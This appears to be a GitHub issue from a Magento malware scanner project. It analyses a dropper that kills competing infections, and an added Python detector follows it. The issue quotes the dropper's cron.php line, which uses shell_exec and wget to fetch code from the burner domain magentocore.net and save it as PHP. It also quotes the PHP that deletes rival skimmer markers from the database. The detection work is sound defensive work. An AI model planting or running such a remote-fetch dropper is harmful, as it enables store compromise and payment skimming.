gwillem / magento-malware-scanner

Scanner, signatures and the largest collection of Magento malware
GNU General Public License v3.0

Malware killing malware #222

Closed gwillem closed 6 years ago

gwillem commented 6 years ago

This blog describes a malware dropper from magentocore.net. The latter is a well known burner domain (already in our archive) but apparently the dropper looks for several other malware to kill.

The dropper adds this to cron.php:

shell_exec ("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");

Then, clear.json is actually PHP and contains:

// Markers of competing infections; each is matched as a SQL LIKE pattern
$signaturez = array('%ATMZOW%','%19303817.js%','%PZ7SKD%');
foreach ($signaturez as $sing) {
        mysqli_query($link, "delete from " . $db_prefix . "core_config_data where value like '$sing'");
}

So it will remove previous malware infections (those are often in the "design" config directives). ATMZOW and PZ7SKD seem to refer to the same type of obfuscation, which includes a payment skimmer that sends to vamberlo.com. In this PR, I have included a signature that will cover them both.

The 19303817.js is curious. Publicwww has found one instance on goodsneaker.club (not live anymore). There, it is part of this url: http://js.users.51.la/19303817.js. The domain 51.la appears to be a Chinese clone of Google Analytics. Curiously, there are several thousand Magento stores that include this analytics in the <address> tag. This looks fishy. Also, those 51.la links are flagged as malware by many virus scanners. But I haven't established the business case behind this abuse yet. Any ideas? I have not included 51.la in the scanner yet, because it is used by Chinese stores as well (where it is supposedly legitimate).
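As an added illustration (not part of this issue or the scanner's own code), a Python check that reports the same three markers the dropper deletes from core_config_data, and that flags the cron.php pattern of fetching a remote file and writing it out as .php. The config rows and the cron.php excerpt are constructed sample data.

```python
import re

# Constructed sample rows in the shape of Magento's core_config_data (path, value).
# The "design/*" paths are where the issue says these injections usually live.
SAMPLE_CONFIG_ROWS = [
    ("design/head/includes", '<script src="http://js.users.51.la/19303817.js"></script>'),
    ("design/footer/absolute_footer", "<script>/*ATMZOW*/eval(atob(PAYLOAD))</script>"),
    ("web/unsecure/base_url", "https://store.example/"),
    ("design/head/includes", "<script>PZ7SKD();</script>"),
]

# Markers the dropper itself removes; finding one means an earlier infection is present.
INDICATORS = ("ATMZOW", "PZ7SKD", "19303817.js")


def find_config_indicators(rows, indicators=INDICATORS):
    """Return (path, marker) for every config value containing a known marker.

    Same substring match as the dropper's LIKE '%marker%', but it reports instead of deleting.
    """
    hits = []
    for path, value in rows:
        for marker in indicators:
            if marker in value:
                hits.append((path, marker))
    return hits


# Dropper shape from the issue: shell_exec() runs wget/curl on a remote URL and
# writes the response to a .php file (clear.json saved as clear.php).
DROPPER_RE = re.compile(
    r"""shell_exec\s*\(\s*["'](?:wget|curl)\b[^"']*?(https?://\S+)[^"']*?-[oO]\s*(\S+\.php)"""
)


def find_dropper_calls(php_source):
    """Return (url, destination) for each remote fetch that is written to a .php file."""
    return [(m.group(1), m.group(2)) for m in DROPPER_RE.finditer(php_source)]


# Constructed cron.php excerpt carrying the dropper line quoted in the issue.
SAMPLE_CRON = """<?php
require 'app/Mage.php';
shell_exec ("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1");
Mage::app()->setUseSessionInUrl(false);
"""

if __name__ == "__main__":
    for path, marker in find_config_indicators(SAMPLE_CONFIG_ROWS):
        print(f"core_config_data {path}: contains {marker}")
    for url, dest in find_dropper_calls(SAMPLE_CRON):
        print(f"cron.php: fetches {url} and writes it to {dest}")
```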